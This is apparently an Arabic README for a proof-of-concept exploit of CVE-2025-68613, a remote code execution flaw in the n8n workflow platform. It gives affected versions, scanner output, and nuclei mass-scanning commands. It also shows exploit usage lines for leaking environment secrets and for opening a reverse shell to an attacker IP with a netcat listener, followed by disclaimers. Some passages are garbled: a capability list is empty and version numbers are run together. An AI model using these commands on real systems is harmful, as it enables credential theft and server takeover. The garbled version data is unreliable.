
CVE-2025-68613

الخطورة: 🔴 حرجة الأثر: تنفيذ تعليمات برمجية عن بُعد المنصة المتأثرة: n8n (أتمتة سير العمل)
تُعد CVE-2025-68613 ثغرة أمنية حرجة في n8n، وهي منصة أتمتة سير عمل مفتوحة المصدر. تسمح هذه الثغرة لمهاجم مُصادَق بتنفيذ تعليمات برمجية عشوائية على الخادم عبر استغلال طريقة تقييم تعبيرات سير العمل.
💥 لماذا هي خطيرة؟ يتم تقييم التعبيرات الخبيثة في سياق غير معزول بشكل صحيح، مما يتيح الوصول إلى بيئة التشغيل الأساسية.

إذا تم استغلالها، يمكن للمهاجم القيام بما يلي:
يعمل الهجوم بصلاحيات مطابقة لصلاحيات خدمة n8n، مما يضاعف أثره.
| المقياس | القيمة |
|---|---|
| CVSS v3.1 | ~9.9–10.0 |
| السرية | عالية |
| التكامل | عالية |
| التوفر | عالية |
➡️ المصادقة مطلوبة، لكن لا يلزم وصول إداري.
🚫 الهشة:
0.211.0 → 1.120.31.121.0✅ المصحّحة:
1.120.41.121.11.122.0 والإصدارات الأحدث(لا يزيل الثغرة بالكامل)
CVE-2025-68613.py — فاحص الإصدار والتعرض عن بُعد (آمن)sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2
--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678
أو إذا كنت تريد فحص قائمة من المضيفين، نفّذ:
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt
مثال على المخرجات
أمثلة على الاستخدام:
تسريب متغيرات البيئة:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak
الحصول على معلومات المستخدم:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id
صدفة عكسية (شغّل المستمع أولاً: nc -lvnp 4444):
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444
هذا السكربت مخصص لاختبار الأمان المصرح به فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
🔒 هذا السكربت هو استغلال إثبات المفهوم (PoC) لثغرة CVE-2025-68613 في n8n.
📚 يُقدَّم لأغراض تعليمية فقط ولاختبار الأمان المصرح به فقط.
🛡️ استخدمه حصريًا على الأنظمة التي تملكها أو تتحكم بها أو لديك إذن كتابي صريح لاختبارها.
🚫 الاستخدام غير المصرح به ضد أي نظام غير قانوني وقد ينتهك القوانين (مثل قوانين الاحتيال وإساءة استخدام الحاسوب).
❌ لا يتحمل المؤلف وأي أطراف مرتبطة به أي مسؤولية عن إساءة الاستخدام أو الضرر أو العواقب القانونية.
✅ استخدمه بمسؤولية وأخلاقيًا وبتوافق كامل مع جميع القوانين واللوائح المعمول بها.
🔐 إذا كنت تجري اختبار اختراق، فتأكد من توفر التفويض المناسب (مثل قواعد الاشتباك).
🛠️ قد يستخدم باحثو الأمان هذا السكربت للتحقق من الثغرات وتشجيع التصحيح في الوقت المناسب.
| الفئة | المعلومات |
|---|
| معرّف CVE | CVE-2025-68613 |
| المنتج | n8n |
| فئة الثغرة | حقن التعبيرات |
| النتيجة | تنفيذ تعليمات برمجية عن بُعد |
| الوصول المطلوب | مستخدم مُصادَق |
| الإصلاح متاح | نعم |